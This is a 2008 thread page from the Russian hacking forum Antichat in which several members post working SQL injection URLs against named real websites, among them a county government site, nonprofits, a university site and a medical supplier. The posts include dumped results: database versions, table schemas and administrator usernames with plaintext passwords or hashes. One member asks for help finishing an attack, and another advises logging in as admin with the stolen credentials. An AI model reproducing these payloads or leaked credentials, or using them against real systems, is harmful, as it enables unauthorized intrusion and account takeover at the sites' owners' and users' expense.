ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5811  
Старый 27.06.2008, 01:51
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

gisTy И так .. начнём !
Цитата:
http://www.flaglercounty.org/garbage/pages.php?PID=-999951+union+select+1,2,3,4,concat_ws(0x3a,usernam e,password),null,7,8+from+fc_current.adminlogin/*
webmaster:taterdome
Цитата:
http://www.flaglercounty.org/garbage/pages.php?PID=-999951+union+select+1,2,3,4,concat_ws(0x3a,usernam e,password),null,7,8+from+ffr_cal.ltw_usersv4/*
Webmaster:RbgJxoUvwG7qk
Цитата:
http://www.flaglercounty.org/garbage/pages.php?PID=-999951+union+select+1,2,3,4,concat_ws(0x3a,usernam e,password),null,7,8+from+ffr_ashnews.ashprojects_ users/*
steve;peanut
================================================== ===
http://www.thegenesisgroup.org/calendar/event_info.php?eventid=-16+union+select+1,2,convert(concat_ws(0x3a,user,pa ssword,host),binary),4,null,6,7+from+mysql.user/*
доступ рутовый без пароля .. но только с локалхоста и прилогоющих
 
Ответить с цитированием

  #5812  
Старый 27.06.2008, 13:10
Аватар для Phm.phx
Phm.phx
Постоянный
Регистрация: 12.01.2008
Сообщений: 336
Провел на форуме:
797429

Репутация: 598
Отправить сообщение для Phm.phx с помощью ICQ
По умолчанию

http://www.rozymnuk.com.ua/?chek=listgoods&id_categories=165'
 
Ответить с цитированием

  #5813  
Старый 27.06.2008, 16:43
Аватар для Mike 007
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
Cool

Код:
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),0x3a,user(),0x3a,version()),3/*
Помогите раскрутить доконца

globalwaterfoundation_org_-_1
globalwater@web2.4what.net
5.0.37-community-log


Код:
http://www.ewb-usa.org/news.php?ID=-1+order+by+1/*
Код:
http://www.english-zone.com/index.php?ID=-1'
Код:
http://musicsclub.com/index.php?id=-1+union+select+1,2,3,4/*
Код:
http://www.velostyle.com.ua/index.php?id=-1'

Последний раз редактировалось Mike 007; 27.06.2008 в 17:14..
 
Ответить с цитированием

  #5814  
Старый 27.06.2008, 16:57
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
Сообщение от Mike 007  
Код:
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),0x3a,user(),0x3a,version()),3/*
Помогите раскрутить доконца

globalwaterfoundation_org_-_1
globalwater@web2.4what.net
5.0.37-community-log
Цитата:
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,user_username,user _password),3+from+wma_users+limit+0,1/*
4what:4what
 
Ответить с цитированием

  #5815  
Старый 27.06.2008, 19:13
Аватар для cash$$$
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

Цитата:
http://www.ontariohockeyleague.com/events/pop.php?id=99999+union+select+1,2,3,VERSION(),5,6, 7,8/*
version: 5.0.22-log
user: newsport@node1.leaguestat.com
database: ohl

=============================================
Цитата:
http://www.omn.ru/news_text.php?id=99999+union+select+1,2,3,version( ),5,6,7,8/*
version: 4.0.27-log
user: modest_hash@zvm7.host.ru
database: modest?hash

=============================================
Цитата:
http://www.world-challenge.com/news/story.php?ID=99999+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,version(),16,17/*
version: 4.0.27-nt-log
user: sccawc@phoebe.dvti.com
database: worldchallenge

=============================================
 
Ответить с цитированием

cash$$$
  #5816  
Старый 27.06.2008, 20:01
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию cash$$$

для cash$$$
Цитата:
http://www.world-challenge.com/news/story.php?ID=99999+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,concat_ws(0x3a,username,password),1 6,17+from+users/*
jsteflik:06redfp1
Цитата:
http://www.world-challenge.com/news/story.php?ID=99999+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,concat_ws(0x3a,admin,admin_pw),16,1 7+from+phpads_config/*
adserver:75936c960fc65ef83ee6b54ecd7d3c05:roadrace
 
Ответить с цитированием

  #5817  
Старый 28.06.2008, 04:02
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

PR 4
Цитата:
http://www.brainteasercentral.com/riddle.php?riddleid=-1+union+select+concat_ws(0x3a3a,version(),user(),d atabase()),2,3,4,5,6,7,8/*
version(): 4.1.22
user(): braintea_btuser@localhost
database(): braintea_btcom


PR 3
Цитата:
http://logica.online-gratuite.ro/riddle.php?riddleid=-133+union+select+concat_ws(0x3a3a3a,version(),user (),database()),null,null,4,5,6,null/*&status=a
Version(): 4.1.22-standard
User(): jocuriha_stefan@localhost
Database(): jocuriha_stefan@localhost


PR 3
Цитата:
http://www.allriddles.com/riddle.php?riddleid=-211+union+select+concat_ws(0x3a3a3a,version(),user (),database()),2,3,4,5,6,7/*
Version(): 4.1.22-standard
User(): allriddl_allridd@localhost
Database(): allriddl_allriddles
 
Ответить с цитированием

  #5818  
Старый 28.06.2008, 09:53
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

Pr6:
mel.org
Код:
http://mel.org/SPT--BrowseResources.php?ParentId=748+union+select+111,222,333,444,555,user(),777,888,999--
www.grow.arizona.edu
Код:
http://www.grow.arizona.edu/SPT--BrowseResources.php?ParentId=291+union+select+1,2,3,4,5,user(),7,8,9--
www.wildscreenfestival.org
Код:
http://www.wildscreenfestival.org/index.php?pageid=-303+union+select+1,2,3,concat(username,0x3a,user_password),user(),6,7+from+phpbb_users--&parentid=257
Код:
http://www.wildscreenfestival.org/index.php?pageid=-303+union+select+1,2,3,concat(table_schema,0x3a,table_name,0x3a,column_name),5,6,7+from+information_schema.columns--&parentid=257

Pr5:
www.festivalofnature.org
Код:
http://www.festivalofnature.org/festival.php?pageid=-3+union+select+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name,0x3c62722f3e),6,7+from+information_schema.columns--&parentid=0

Последний раз редактировалось Dr.Frank; 28.06.2008 в 11:43..
 
Ответить с цитированием

  #5819  
Старый 28.06.2008, 13:34
Аватар для Imperou$
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

www.zonemedical.com.au

http://www.zonemedical.com.au/product_details.php?pid=-121+UNION+SELECT+1,2,CONCAT_WS(0x3A3a,username,pas sword),4,5,6,7,8+FROM+users+limit+0,1/*

5.0.45-community


Код:
18:brands
18:--1:id
18:--2:name
19:categories
19:--1:id
19:--2:name
20:file_types
20:--1:id
20:--2:name
21:files
21:--1:id
21:--2:file_type_id
21:--3:file_name
21:--4:file_size
21:--5:file_description
21:--6:product_id
21:--7:category_id
21:--8:primary_photo
21:--9:user_type_0
21:--10:user_type_2
21:--11:user_type_3
21:--12:user_type_4
22:products
22:--1:id
22:--2:category_id
22:--3:brand_id
22:--4:name
22:--5:product_code
22:--6:description
22:--7:serial_no_format
22:--8:active
22:--9:cashback
23:sections
23:--1:id
23:--2:name
23:--3:content
23:--4:width
24:users
24:--1:id
24:--2:user_type_id
24:--3:username
24:--4:password
24:--5:description
Логинимся с главной под админом:
zonemedical:zone001
 
Ответить с цитированием

  #5820  
Старый 28.06.2008, 14:18
Аватар для Mike 007
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию

4.1.20-standard-log
caffetime_ro_caffe
caffetime@localhost


Цитата:
http://www.caffetime.ro/news.php?id=-1+union+select+1,database(),user(),version()/*
zione_evoluzione | 5.0.45-community

zione_titziano@localhost


Код:
http://www.evoluzione.ro/news.php?id=-1+union+select+1,2,database(),user(),5,6,version()/*

Последний раз редактировалось Mike 007; 28.06.2008 в 15:08..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ